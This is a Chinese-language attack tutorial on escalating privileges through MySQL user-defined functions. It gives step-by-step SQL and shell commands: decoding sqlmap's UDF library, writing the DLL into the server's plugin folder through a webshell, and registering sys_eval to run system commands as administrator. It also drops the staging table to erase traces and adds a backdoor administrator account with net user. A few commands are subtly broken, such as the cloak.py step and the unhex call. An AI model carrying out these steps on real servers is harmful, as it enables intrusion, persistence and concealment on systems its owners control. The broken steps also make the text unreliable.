Mysql提权之udf提权

0x01 udf是什么？

udf(user defined function)，即’用户自定义函数’。是通过添加新函数，对Mysql的功能进行扩充，进行扩充后就像在使用Mysql内置函数如concat()、version()一样。

0x02 如何使用udf？
通常udf在Mysql5.1后的版本中，存在于‘mysql/lib/plugin’目录下，文件后缀为‘.dll’.。假设我的udf文件的名称为‘udf.dll’，存放在Mysql根目录的‘lib/plugin’目录下。在udf.dll文件中，我们定义了名为sys_eval的mysql函数，该函数可以执行系统任意命令。如果我现在在Mysql的命令行中输入‘select sys_eval(‘dir’);’的话，系统会提示sys_eval函数未定义。因为我们仅仅是把‘udf.dll’放在了一个地方，但是并没有在Mysql中引入’udf.dll’中的函数。
所以，应该把’udf.dll’中的自定义函数引入进来。

创建函数的Mysql命令：

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

在命令中，只有两个变量：一个是funciton_name(函数名)，在这里就是sys_eval；还有一个变量是shared_library_name(共享包名称)，即这里的’udf.dll’。

到此已经成功引入了sys_eval函数，下面就是使用了。
这个函数用于执行系统命令，用法如下:

select sys_eval('cmd command');

这样Mysql通过udf提权就成功了。当然这只是个整体过程，下来慢慢说udf提权的细节。

0x03 了解udf对于不同Mysql版本的差异

1. Mysqlb版本大于等于5.1：
   udf.dll必须存放在Mysql安装目录的’lib\plugin’文件夹下。(plugin文件默认不存在，需要自行创建；Mysql安装目录可以通过’select basedir()或者 select @@basedir查看’)。
2. Mysql版本小于5.1:
   如果是win 2000服务器，需要将udf.dll文件导入到’C:\Winnt\udf.dll 下’。
   如果是win 2003服务器，需要将udf.dll文件导出在’C:\Windows\udf.dll 下’。

0x04 使用udf提权
现在已经了解了udf是什么，以及如何引入udf，下面的关注重点就是提权了。其实到这里，提权已经结束，因为对于sys_eval()函数，其中的指令是直接以管理员分权限运行的，所以这也就是最高权限了。

下面整理一下步骤：

1. 将udf文件放到指定位置（Mysql>5.1放在Mysql根目录的lib\plugin文件夹下）
2. 从udf文件中引入自定义函数(user defined function)
3. 执行自定义函数

先看第一步，拿到一个网站的webshell之后，在指定位置创建udf文件。如何创建？先别忘了，现在连源udf文件都没有。sqlmap中有现成的udf文件，分为32位和64位，一定要选择对版本，否则会显示：Can’t open shared library ‘udf.dll’。

自动化注入工具Sqlmap已经集成了此功能。

在 sqlmap\udf\mysql\windows\32目录下存放着lib_mysqludf_sys.dll_

(sqlmap\udf\mysql\windows\64目录下为64位的lib_mysqludf_sys.dll_，但是64位的测试失败）

但是sqlmap 中 自带 的shell 以及一些二进制文件，为了防止被误杀都经过异或方式编码，不能直接使用的。可以利用sqlmap 自带的解码工具cloak.py
目录 sqlmap\extra\cloak\cloak.py 对sqlmap\udf\mysql\windows\32\lib_mysqludf_sys.dll_ 解码后，再直接利用。

---

首先进入到’sqlmap\extra\cloak’目录下，执行命令

C:\sqlmap\data\udf\mysql\windows\32\lib_mysqludf_sys.dll_会生成lib_mysqludf_sys.dll

---

攻击者可以利用lib_mysqludf_sys提供的函数执行系统命令。
sys_eval，执行任意命令，并将输出返回。

sys_exec，执行任意命令，并将退出码返回。

sys_get，获取一个环境变量。

sys_set，创建或修改一个环境变量。

然后将获得的udf.dll文件转换成16进制，可以通过本地使用Mysql函数转换

SELECT hex(load_file('C:\\sqlmap\\data\\udf\\mysql\\windows\\32\\lib_mysqludf_sys.dll')) into dumpfile 'C:\\output\\result.txt';

此时，'C:\output\result.txt’文件的内容就是udf.dll文件的16进制形式

接下来就是把本地的udf.dll的16进制文件通过我们已经获得的webshell传到目标主机上。

1. CREATE TABLE udftmp (c blob); //新建一个表，名为udftmp，用于存放本地传来的udf文件的内容。
2. INSERT INTO udftmp values(unhex('C:\\output\\result.txt')); //在udftmp中写入udf文件内容
3. SELECT c FROM udftmp INTO DUMPFILE 'C:\\PHPStudy\\PHPTutorial\\MySQL\\lib\\plugin\\udf.dll'; //将udf文件内容传入新建的udf文件中，路径根据自己的@@basedir修改
//对于mysql小于5.1的，导出目录为C:\Windows\或C:\Windows\System32\

没有piugin可以手工创建一个plugin文件夹

到这里没有报错的话就说明已经在主机上生成了udf.dll文件。下面要导入udf函数：

1. DROP TABLE udftmp; //为了删除痕迹，把刚刚新建的udftmp表删掉
2. CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll'; //导入udf函数

导入成功的话就可以使用sys_eval函数了:

SELECT sys_eval('dir');
列出当前目录所有的文件

附几个常用的cmd指令，用于添加一个管理员用户：

net user user user /add //添加新用户：user，密码为user
net localgroup administrators user /add //将ka1n4t添加至管理员分组